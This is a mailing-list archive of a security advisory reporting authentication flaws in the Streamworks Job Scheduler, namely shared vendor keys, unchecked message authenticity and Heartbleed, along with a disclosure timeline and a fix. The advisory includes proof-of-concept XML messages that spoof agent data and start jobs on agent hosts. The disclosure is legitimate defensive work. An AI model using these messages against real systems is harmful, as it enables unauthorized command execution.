<!--X-Body-Begin-->
<!--X-User-Header-->
<a href="/fulldisclosure/"><img src="/images/fulldisclosure-logo.png" class="l-logo right" alt="fulldisclosure logo" width="80"></a>
<h2 class="m-list"><a href="/fulldisclosure/">Full Disclosure</a>
mailing list archives</h2>
<!--X-User-Header-End-->
<!--X-TopPNI-->
<div class="nav-bar">
<div class="nav-link">
<a href="41"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="date.html#42">By Date</a>
<a href="43"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<div class="nav-link">
<a href="41"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="index.html#42">By Thread</a>
<a href="43"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<form class="nst-search center" action="/search/fulldisclosure">
<input class="nst-search-q" name="q" type="search" placeholder="List Archive Search">
<button class="nst-search-button" title="Search">
<img style="width:100%;aspect-ratio:1/1;" alt="" aria-hidden="true" src="/shared/images/nst-icons.svg#search">
</button>
</form>
</div>
<!--X-TopPNI-End-->
<!--X-MsgBody-->
<!--X-Subject-Header-Begin-->
<h1 class="m-title">secuvera-SA-2016-01: Multiple authentication weaknesses in Arvato Systems Streamworks Job Scheduler</h1>
<hr>
<!--X-Subject-Header-End-->
<!--X-Head-of-Message-->
<em>From</em>: Simon Bieber <sbieber () secuvera de>
<em>Date</em>: Mon, 14 Jan 2019 12:17:45 +0100
<!--X-Head-of-Message-End-->
<!--X-Head-Body-Sep-Begin-->
<hr>
<!--X-Head-Body-Sep-End-->
<!--X-Body-of-Message-->
<pre style="margin: 0em;">
Affected Products
</pre><tt> Streamworks Job Scheduler Release 7 (older/newer releases have not
</tt><tt>been tested)
</tt><pre style="margin: 0em;">
References
</pre><tt> Secuvera-SA-2016-01
</tt><tt><a rel="nofollow" href="https://www.secuvera.de/advisories/secuvera-SA-2016-01.txt">https://www.secuvera.de/advisories/secuvera-SA-2016-01.txt</a> (used for
</tt><tt>updates)
</tt><tt> No CVE number could be assigned (vendor not listed under
</tt><tt>cve.mitre.org/data/board/archives/2016-01/msg00015.html)
</tt><pre style="margin: 0em;">
Summary:
</pre><tt> Arvato Systems Streamworks Job Scheduler is a software product for
</tt><tt>automation purposes. It helps
</tt><tt> "to plan, maintain, control and monitor all of your automatable IT
</tt><tt>processes" (source: vendor product
</tt><tt> homepage). It consists of different types of services: an
</tt><tt>application server daemon, a processing
</tt><tt> server daemon that controls one or multiple agent daemins
</tt><tt>installed on operating servers were workload
</tt><pre style="margin: 0em;"> has to be done.
</pre><tt> During a penetration test at a customers site three weaknesses
</tt><tt>concerning communication
</tt><pre style="margin: 0em;"> authentication were discovered:
</pre><tt> 1) All agents installed on server systems use the same X.509
</tt><tt>certificates and private key that
</tt><pre style="margin: 0em;"> were issued by the vendor for authentication.
</pre><tt> 2) The processing server component does not check received
</tt><tt>messages properly for authenticity.
</tt><pre style="margin: 0em;">
</pre><tt> 3) Agents installed on servers do not check received messages
</tt><tt>properly for authenticity
</tt><pre style="margin: 0em;">
</pre><tt> 4) Agents and processing servers are vulnerable against TLS
</tt><tt>Heartbleed attack (CVE-2014-0160 -
</tt><pre style="margin: 0em;"> see <a rel="nofollow" href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0160">https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0160</a>)
Effect:
</pre><tt> 1) If systems were compromised and authentication material is
</tt><tt>stolen, all certificates have to be
</tt><tt> revoked and replaced. In addition, this expands the effect of
</tt><tt>3) to the entire environment,
</tt><pre style="margin: 0em;"> not just single systems.
</pre><tt> 2) An attacker with knwolegde of the message syntax of the product
</tt><tt>and the authentication material
</tt><pre style="margin: 0em;"> is able to add, change or delete data within the Streamworks database.
</pre><tt> 3) An attacker with knowledge of the message syntax of the product
</tt><tt>and the authentication material
</tt><tt> is able to create new or execute available jobs on servers with
</tt><tt>agents installed located within
</tt><tt> the same network. This can lead to a complete loss of integrity,
</tt><tt>confidentiality or availability
</tt><pre style="margin: 0em;"> of the respective system or data stored/processed on it.
</pre><tt> 4) An unauthenticated remote attacker is able to read content
</tt><tt>within system memory.
</tt><pre style="margin: 0em;">
Vulnerable components and scripts:
Streamworks Job Scheduler Processing Server Release 7.1
Streamworks Job Scheduler Agent Release 7.1
older releases have not been tested
Examples:
</pre><tt> In the following, a sample to exploit 2) and 3) will be given.
</tt><tt>Replace Information within squared
</tt><pre style="margin: 0em;"> brackets:
</pre><tt> 2) By sending a the following XML-Message to a Processing server
</tt><tt>it is possible to change system
</tt><tt> information of a legitimate configured client as proof-of-concept.
</tt><tt>The System OS Info was slightly
</tt><pre style="margin: 0em;"> changed:
<AgentNotifyStarted ProcessId="7044" AgentVersion="3.1.36">
<ComHeader Version="1.0">
<MandatorCode>0100</MandatorCode>
<MsgCreateTime>2016-02-24T10:26:11[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].745Z</MsgCreateTime>
<MsgSendTime>[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].963Z</MsgSendTime>
</pre><tt> <SourceEndpoint Address="0.0.0.0" Port="30000" SysId="[Hostname of
</tt><tt>legitimate Client]" />
</tt><tt> <DestinationEndpoint Address="[FQDN of Processing server]"
</tt><tt>Port="9600" SysId="[FQDN of Proces
</tt><pre style="margin: 0em;"> sing server]" />
<Sequence>0</Sequence>
</ComHeader>
<SystemInformation>
<OsType>Windows</OsType>
<OsInfo>Pentest Windows!</OsInfo>
<OsLocale>de_DE.windows-1252</OsLocale>
</SystemInformation>
<KnownJobsList>
</KnownJobsList>
<FileTransferOptions Mode="ALL" BlockSize="0" />
<Cli CliOptions="Enabled" />
</AgentNotifyStarted>
-------------
</pre><tt> 3) By sending a XML-Message of the following type to create and
</tt><tt>execute a new job on a system
</tt><pre style="margin: 0em;"> <ServerRequestStartJob>
<ComHeader Version="0.1">
<MandatorCode>0100</MandatorCode>
<MsgCreateTime>[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].1061367Z</MsgCreateTime>
<MsgSendTime>[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].1061367Z</MsgSendTime>
</pre><tt> <SourceEndpoint Address="[FQDN of processing server]"
</tt><tt>Port="9600" SysId="[FQDN of processing
</tt><pre style="margin: 0em;"> server]" />
</pre><tt> <DestinationEndpoint Address="[IP of Server with agent
</tt><tt>installed]" Port="30000" SysId="[Hostname of
</tt><pre style="margin: 0em;"> server with agent installed]" />
<Sequence>1</Sequence>
<MandatorId>0100</MandatorId>
</ComHeader>
<JobStartInfo>
</pre><tt> <JobInfo ServerJobId="118291965_1" ExecutionNo="1"
</tt><tt>PlanDate="[YYYY]-[MM]-[DD]"
</tt><pre style="margin: 0em;"> StreamName="[NewStreamName]" JobName="[NewJobName]" Run="1" />
</pre><tt> <UserName>[Username under which the agent should run the
</tt><tt>Script, e.g. LOCAL\System]</UserName>
</tt><pre style="margin: 0em;"> <Password>[Add Password of the user if needed]</Password>
<UseUserProfile>true</UseUserProfile>
</pre><tt> <MainScript>[base64-encoded Script code, e.g.
</tt><tt>"cmVtDQpDOlxXaW5kb3dzXE5vdGVwYWQuZXhl"
</tt><pre style="margin: 0em;"> to start a notepad.exe on a Windows Host]</MainScript>
<KeepJoblogDays>10</KeepJoblogDays>
</JobStartInfo>
</ServerRequestStartJob>
Solution:
Install Streamworks Release 9.3
</pre><tt>
</tt><tt>(<a rel="nofollow" href="https://it.arvato.com/de/solutions/it-solutions/lp/streamworks-release-9-3.html">https://it.arvato.com/de/solutions/it-solutions/lp/streamworks-release-9-3.html</a> - page available
</tt><tt>in
</tt><pre style="margin: 0em;"> german only)
Disclosure Timeline:
2016/05/12 vulnerabilities discovered
2016/05/30 vendor initially contacted
2016/06/13 sales representative replied
2016/06/14 technically responsible contact details received
</pre><tt> 2016/07/01 technical personnel contacted, appointment to discuss
</tt><tt>findings made
</tt><pre style="margin: 0em;"> 2016/07/11 submitted technical details to responsible personnel
</pre><tt> 2016/07/12 responsible product manager replied. Committed to
</tt><tt>extend disclosure timeline due to
</tt><tt> comprehensible reasons. New disclosure timeline: end of
</tt><tt>September 2016
</tt><pre style="margin: 0em;"> 2016/09/08 product manager replied, suggest meeting to discuss fixes
</pre><tt> 2016/09/27 meeting took place, half of the vulnerabilities were
</tt><tt>fixed. Timeline until disclosure extended
</tt><tt> again due to difficult changes. Disclosure timeline
</tt><tt>extended to end of April 2017
</tt><tt> 2017/04/20 Contacted vendor again to remind of the near end of the
</tt><tt>disclosure timeline.
</tt><pre style="margin: 0em;"> 2017/04/27 Reply and ongoing discussion about when the fix will be shipped.
</pre><tt> 2017/05/20 Vendor replied that due to customers experience fewer
</tt><tt>releases were made. The fix will be shipped
</tt><tt> on the second quarter of 2018. Extended disclosure
</tt><tt>timeline until the end of June 2018.
</tt><pre style="margin: 0em;"> 2018/04/03 Contacted vendor as reminder and to get a release ship date.
</pre><tt> 2018/04/09 Vendor replied saying that within release 9.3 (shipped
</tt><tt>on 2nd quarter 2018) the issues will be fixed
</tt><tt> Final disclosure timeline: 2019/01/14 after a
</tt><tt>sufficient grace period to customers to install the fixed
</tt><pre style="margin: 0em;"> release
2019/01/14 public advisory disclosure
Credits
Simon Bieber, secuvera GmbH
sbieber () secuvera de
<a rel="nofollow" href="https://www.secuvera.de">https://www.secuvera.de</a>
Disclaimer:
</pre><tt> All information is provided without warranty. The intent is to
</tt><tt>provide informa-
</tt><tt> tion to secure infrastructure and/or systems, not to be able to
</tt><tt>attack or damage.
</tt><tt> therefore secuvera shall not be liable for any direct or indirect
</tt><tt>damages that
</tt><pre style="margin: 0em;"> might be caused by using this information.
_______________________________________________
Sent through the Full Disclosure mailing list
<a rel="nofollow" href="https://nmap.org/mailman/listinfo/fulldisclosure">https://nmap.org/mailman/listinfo/fulldisclosure</a>
Web Archives & RSS: <a rel="nofollow" href="http://seclists.org/fulldisclosure/">http://seclists.org/fulldisclosure/</a>
</pre>
<!--X-Body-of-Message-End-->
<!--X-MsgBody-End-->
<!--X-Follow-Ups-->
<hr>
<!--X-Follow-Ups-End-->
<!--X-References-->
<!--X-References-End-->
<!--X-BotPNI-->
<div class="nav-bar">
<div class="nav-link">
<a href="41"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="date.html#42">By Date</a>
<a href="43"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<div class="nav-link">
<a href="41"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="index.html#42">By Thread</a>
<a href="43"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
</div>
<h3 class="m-thread">Current thread:</h3>
<ul class="thread">
<li><strong>secuvera-SA-2016-01: Multiple authentication weaknesses in Arvato Systems Streamworks Job Scheduler</strong> <em>Simon Bieber (Jan 15)</em>
</li></ul>
<!--X-BotPNI-End-->
<!--X-User-Footer-->
<!--X-User-Footer-End-->
<p>